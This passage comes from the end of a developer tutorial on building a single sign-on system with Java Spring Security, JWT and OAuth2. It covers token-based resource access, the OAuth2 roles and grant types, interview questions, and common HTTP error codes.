2. Log in at localhost:8080/login-sso.html to obtain the access_token.
3. Access the resource with the token (the "sca" prefix in the URL is specified in the resource server; write the URL according to how your gateway is configured).
Success: the upload completes.
403 exception: no access permission for this resource.
4.5 OAuth2 specification
OAuth2 defines an authentication and authorization protocol. The specification defines four roles:
1) Resource owner (the user)
2) Authorization server (jt-auth)
3) Resource server (jt-resource)
4) Client application (jt-ui)
The protocol also specifies several authorization modes (grant types):
1) Password mode (authentication with user name and password, as used in this article; it hands the user's password to the client application, which is why OAuth 2.1 drops it)
2) Authorization code mode (what we usually call third-party login: QQ, WeChat, Weibo, ...)
3) ...
4.6 Interview question points
Design architecture of a single sign-on system (microservice architecture)
Design and partition of services (resource server, authentication server, gateway server, client service)
The process of authentication and resource access (authenticate first, then access resources)
Key technologies in authentication and authorization (Spring Security, JWT, OAuth2)
FAQ analysis
Why single sign-on? (In a distributed system the user should not have to log in again for every service; it improves the user experience.)
Single sign-on solutions? (Two are common in the market: Spring Security + JWT + OAuth2, and Spring Security + Redis + OAuth2.)
What is Spring Security? (The security framework of the Spring ecosystem; it implements authentication and authorization.)
What is JWT? (A token format and specification: a token built from encoded and signed JSON data.)
What is OAuth2? (An authorization specification that defines the division of roles in single sign-on and the related grant types.)
...
5 Bug analysis
401: no (valid) authentication when accessing the resource.
403: authenticated, but no permission to access the resource.
404: the accessed resource cannot be found (check the URL of the resource you are accessing).
405: the request method does not match (the client sends GET but the server handles POST, or the reverse).
500: a server-side error; it cannot be solved without reading the backend log (look for error and warn entries).
...
That concludes the content of "using Java spring to achieve single sign-on system". Thank you for reading.